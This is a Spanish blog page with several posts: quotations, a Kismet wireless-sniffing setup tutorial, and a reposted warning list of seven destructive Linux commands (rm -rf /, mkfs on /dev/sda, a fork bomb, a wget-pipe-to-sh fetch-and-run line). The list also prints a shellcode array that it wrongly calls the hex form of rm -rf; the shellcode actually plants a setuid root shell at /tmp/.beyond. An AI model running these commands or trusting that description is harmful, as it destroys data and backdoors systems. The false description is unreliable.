Bajo ciertos acontecimientos que me vienen pasando, que ni mera importancia tiene para terceros, me descargo con citas clásicas pero que vale recordar…

Hay dos cosas infinitas: el Universo y la estupidez humana. Y del Universo no estoy seguro.
(Albert Einstein)

La diferencia entre genialidad y estupidez, es que la genialidad tiene límites.
(Anónimo)

La estupidez siempre se coloca en primera fila para que la vean. La inteligencia detrás para ver.
(Anónimo)

La ignorancia puede ser curada pero la estupidez es eterna.
(Masahide)

Las personas no estan jamás tan cerca de la estupidez como cuando se creen sabias.
(Jean-Baptiste Molière)

Responder a lo obvio es alimentar la estupidez del que pregunta.
(Carbayobsky)

La soberbia es tal vez una de las formas de expresión más refinadas que tiene la estupidez
(Ricardo Combariza)

Debería recordarla todos los días…

 

Bueno, hoy le toco la hora a Kismet, wikipedia lo define como:

Kismet es un sniffer, un husmeador de paquetes, y un sistema de detección de intrusiones para redes inalámbricas 802.11. Kismet funciona con cualquier tarjeta inalámbrica que soporte el modo de monitorización raw, y puede rastrear tráfico 802.11b, 802.11a y 802.11g. El programa corre bajo Linux, FreeBSD, NetBSD, OpenBSD, y Mac OS X. El cliente puede también funcionar en Windows, aunque la única fuente entrante de paquetes compatible es otra sonda.

Asi que de más está decir que lo que todo lo aprendido es con fines didácticos y de aprendizaje sin fines de perjudicar ningun sistema o red… ;)

Desde ya un tiempo, trabajo solo bajo linux, asi que vamos a excluir a los usuarios de windows de este tutorial..(basemonos en que estamos en alguna distribución en base a debian como ubuntu o el mismisimo debian )

La instalación va a ser simple, con privilegios de root (logueando con “su” o anteponiendo el prefijo “sudo” al comando) hacemos lo siguiente:

instalar en debian:
# apt-get install kismet

instalar en ubuntu:
$ sudo apt-get install kismet

Una vez instalado, kismet no viene configurado, por ende vamos a tener que modificar el archivo que se encuentra en /etc/kismet llamado kismet.conf ; supongamos que editamos visualmente con gedit:

en debian:
# gedit /etc/kismet/kismet.conf

De ahora en más, ultimo ejemplo en ubuntu, simplemente anticipan con el comando “sudo” para dar privilegios de root al comando que le sigue..:
$ sudo gedit /etc/kismet/kismet.conf

y debemos modificar puntualmente 2 lineas:

1) Donde diga “suiduser=” debemos escribir luego del “=” nuestro nombre de usuario en linux(borrar el “#” al principio de la linea si es que aparece, eso significaría que la linea está comentada..), ejemplo:
suiduser=mariano

2) Donde aparece “source=XX,XX,XX” (donde X puede ser cualquier cosa..) modificar por algo del estilo:
source=ipw2200,wlan0,ipw2200
#Donde wlan0 es la interface donde queremos usar.. ej: wlan1, wlan0, eth0, eth1, etc...

Luego de esto, debemos poner en modo monitor nuestra interface, SUPONGAMOS QUE ESTAMOS TRABAJANDO CON wlan0 : (cada salto de linea es un enter, un comando nuevo para dar:)
# ifconfig wlan0 down
# iwconfig wlan0 mode manager
# ifconfig wlan0 up

Una vez hecho esto, podriamos ir a una consola, loguearnos como root y correr el comando kismet:
# kismet

Y luego de esto, en teoría, deberia arrancar correctamente:

Click en la imagen o aqui para agrandar

Pantallazo-root@mariano: -home-mariano

Por una razón obvia de aprendizaje, no borro ningún dato de la imagen.. ;-)

Y bueno, ya aquí es pura imaginación suya lo que pueden averiguar, investigar sobre SUS REDES, para MEJORAR LA SEGURIDAD… :)

Ahora bien, ya lo tenemos, pero no nos familiarizamos con el uso de Kismet, bueno, no quiero extender tanto esto, asi que voy a dejar buenos links donde se detalla el significado de cada sigla, teclas de acceso, etc…

Aunque mi ayuda preferida es, que si no saben que apretar, apreten la “h” donde les lista todo, en inglés…

Webs de mayor información específica de Kismet:

http://www.elhacker.net/manual_hacking_wireless_en_linux.htm ==> Utilización de kismet como etapa de un proceso.. :P .

http://hwagm.elhacker.net/ipw2200/ipw2200-inyeccion-linux.htm ==> Primero explica como instalar ubuntu (x_X) pero al final da especificaciones sobre la instalación de Kismet.

http://hwagm.elhacker.net/htm/kismet.htm ==> Kismet a profundidad, creo que el mejor de los links para familiarizarse con el programa.

—–

Esto es todo por ahora sobre kismet, queda pendiente para próximos posts, hablar sobre tcpdump (comando), wireshark(gui para linux que utiliza tcpdump) y el paquete aircrack-ng !

Espero les interese lo escrito, no duden en preguntar cualquier detalle que tengan dudas o quieran profundizar… Éxitos.. HH

 

Esta lista esta hecha para aquellas personas que son nuevas en el mundo linux y deberían familiarizarse con estos términos para “no” usarlos en sus sistemas.. ¿Porqué no usarlos? porque perderías toda la información que tengas en la maquina.. Aunque no hay nada como probarlos previo backup y/o en maquina que no se utiliza :P

Los 7 comandos con sus respectivas consecuencias…

1) rm -rf /

Este comando fuerza la eliminación de todos los archivos en el directorio raiz..

Aquí un video para que lo entiendan.

2) char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Esta es la versión hexadecimal del anterior..

3) mkfs.ext3 /dev/sda

Este reformatea todos los archivos del dispositivo que se menciona después de que el comando mkfs.

4) :( ){:|:&};: mi favorito..

Es la bomba logica mas corta.. conocida como bomba Fork.
Lo que hace es ejecutar una interminable cadena de procesos haciendo que se cuelgue cualquier maquina y hasta puede llegar a corromper varios archivos..

5) any_command > /dev/sda

Provoca que datos RAW sean escritos en un bloque del dispositivo, a veces provoca la pérdida de todos tus datos por abuso del sistema de ficheros.

6) wget http://some_untrusted_source -O- | sh

Shellscript.. lo que hace es descargar algo desde la ubicación mencionada y lo ejecuta.. típico caso de intrusión en sistemas linux.

7) mv /home/yourhomedirectory/* /dev/null

Mueve todos los archivos dentro del directorio home a un lugar que no existe, por lo que nunca los volves a ver..

No lo intenten en sus casas :D si es que quieres probar lo puedes hacer instalando alguna distro linux en virtualbox y sacarte las ganas..

Via | hardsoftgeek.com.ar

 

Para todos los nostalgicos del querido Family Game(personalmente tenia un Zonga..), un video de la mano del PES en agradecimiento a los famosos 8bits…

 

Asi es.. Al tratar de ingresar a Gmail en este momento… PUMBA !!

google_caido

© 2011 Blog Suffusion theme by Sayontan Sinha